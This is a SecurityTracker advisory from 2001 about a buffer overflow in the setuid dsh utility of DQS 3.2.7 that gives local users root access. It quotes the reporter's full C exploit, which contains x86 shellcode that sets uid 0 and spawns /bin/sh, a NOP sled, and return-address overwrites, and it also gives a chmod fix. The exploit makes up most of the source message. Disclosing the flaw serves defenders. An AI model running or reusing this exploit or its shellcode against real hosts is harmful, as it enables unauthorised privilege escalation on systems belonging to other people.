SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   Application (Generic)  >   Dqs (Distributed Queueing System) Vendors:   Florida State University
DQS Distributed Queueing System Utility for Unix/Linux Allows Local Users to Obtain Root Level Access on the Host
SecurityTracker Alert ID:  1001580
SecurityTracker URL:  http://securitytracker.com/id/1001580
CVE Reference:   GENERIC-MAP-NOMATCH   (Links to External Site)
Date:  May 19 2001
Impact:   Execution of arbitrary code via local system, Root access via local system
Exploit Included:  Yes  
Version(s): dqs 3.2.7
Description:   The DQS distributed queueing system contains a distributed shell utility (dsh) that is vulnerable to a local root exploit, allowing local users to obtain root level access on the host.

It is reported that if the dsh utility is provided a long string for the first command line argument, program gives a SIGSEGV signal. Because the utility is typically installed with set userid (suid) privileges, this allows a local user to execute arbitrary code on the host and obtain root level access.

The author of the report notes that SusE 6.3, 6.4, and 7.0 all have the dqs 3.2.7 installed by default.

Demonstration exploit code is provided in the Source Message.

Impact:   A local user can obtain root level access on the host.
Solution:   No solution was available at the time of this entry. However, the author of the report suggests removing the set userid (suid) setting on the /usr/bin/dsh file.
Vendor URL:  packages.debian.org/stable/admin/dqs.html (Links to External Site)
Cause:   Boundary error
Underlying OS:  Linux (Any), UNIX (Any)

Message History:   None.


 Source Message Contents

Subject:  dqs 3.2.7 local root exploit.



Subject: dqs 3.2.7 local root exploit.

Hello.

DESCRIPTION:
I found a buffer overflow vunerability on the
/usr/bin/dsh (dqs 3.2.7
package).

I really don't know if this bug was discovered
already. if thats right,
then sorry =).

If a long line on the first argument is gived, the
program gives a SIGSEGV
signal.

This bug was reported to Drake Diedrich, Mantainer
for dqs
(Drake.Diedrich@anu.edu.adu).

AFFECTED:
SusE 6.3, 6.4, 7.0 have the dqs 3.2.7 by default
an then it are vunerable,
maybe others.

FIX:
Remove the SUID permission
|root@netdex /root|# ls -la /usr/bin/dsh
-rwsr-xr-x    1 root     root       502748 May 18
00:36 /usr/bin/dsh
|root@netdex /root|# chmod -s /usr/bin/dsh
|root@netdex /root|# ls -la /usr/bin/dsh
-rwxr-xr-x    1 root     root       502748 May 18
00:36 /usr/bin/dsh
|root@netdex /root|#

EXAMPLE EXPLOIT: 
You can found the exploit at
www.raza-mexicana.org/programas/programas/qsexp.c
And here it is:

----CUT HERE----

/* - dqsexp.c - */
/********************************************************************/
/* /usr/bin/dsh(dqs 3.2.7 package) local root
exploit.              */
/* SuSE 6.3, 6.4, and 7.0 are
vunerable.                            */
/* dex@raza-mexicana.org <>
http://www.raza-mexicana.org            */
/* Saludos: dr_fdisk^, yield, vlad, deadsector,
trovalz, fatal,     */
/* megaflop y a todo raza. que weba escribirlos
todos XD.           */
/* En especial saludos al espa~olete(NOP) :P, ya
sabes porque.      */
/*                                                                 
*/
/*        - dex@raza-mexicana.org <>
http://www.raza-mexicana.org - */
/********************************************************************/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

#define BUFFSIZE 2772
#define OFFSET 0
#define ALIGN 0

unsigned long get_sp(void) {
__asm__("movl %esp, %eax");
}

static char code[]=                      /* stolen
from mount.c :P   */

  "\x29\xc0"                             /* subl
%eax, %eax          */
  "\xb0\x46"                             /* movb
$70, %al            */
  "\x29\xdb"                             /* subl
%ebx, %ebx          */
  "\xb3\x0c"                             /* movb
$12, %bl            */
  "\x80\xeb\x0c"                         /* subb
$12, %bl */
  "\x89\xd9"                             /* movl
%ebx, %ecx          */
  "\xcd\x80"                             /* int
$0x80                */
  "\xeb\x18"                             /* jmp
callz                */
  "\x5e"                                 /* popl
%esi                */
  "\x29\xc0"                             /* subl
%eax, %eax          */
  "\x88\x46\x07"                         /* movb
%al, 0x07(%esi)     */
  "\x89\x46\x0c"                         /* movl
%eax, 0x0c(%esi)    */
  "\x89\x76\x08"                         /* movl
%esi, 0x08(%esi)    */
  "\xb0\x0b"                             /* movb
$0x0b, %al          */
  "\x87\xf3"                             /* xchgl
%esi, %ebx         */
  "\x8d\x4b\x08"                         /* leal
0x08(%ebx), %ecx    */
  "\x8d\x53\x0c"                         /* leal
0x0c(%ebx), %edx    */
  "\xcd\x80"                             /* int
$0x80                */
  "\xe8\xe3\xff\xff\xff"                 /* call
start               */
  "\x2f\x62\x69\x6e\x2f\x73\x68";


void main(int argc, char **argv) {

int i;
unsigned long addr;

char *buffer;

int offset=OFFSET;
int buffsize=BUFFSIZE;
int align=ALIGN;

if (argc > 1 ) offset = atoi(argv[1]);
if (argc > 2 ) align = atoi(argv[2]);
if (argc > 3 ) buffsize = atoi(argv[3]);

buffer = (char *)malloc(buffsize + 8);

addr = get_sp() - offset;
 
for(i = 0; i < buffsize; i += 4) {
   *(long *)&buffer[i] = 0x90909090;
 }
 
 *(long *)&buffer[buffsize - 8] = addr;
 *(long *)&buffer[buffsize - 4] = addr;
 
 memcpy(buffer + buffsize - 8 - strlen(code) -
align, code, strlen(code));
 

printf("=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\n");
 printf("[*] /usr/bin/dsh(dqs 3.2.7 package) local
root exploit.\n");
 printf("[*] - dex@raza-mexicana.org <>
http://www.raza-mexicana.org -
\n");

printf("=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\n\n");
 
 printf("[*] Address=0x%x, Align=%d, Offset=%d\n",
addr, align, offset);

printf("=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\n\n");
 printf("[*] Starting....\n");
 
 execl("/usr/bin/dsh", "dsh", buffer,
"/etc/motd",  NULL);
}

----EOF----

=================================================
Mail: dex@raza-mexicana.org
Page: http://www.raza-mexicana.org
===============================================

 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2021, SecurityGlobal.net LLC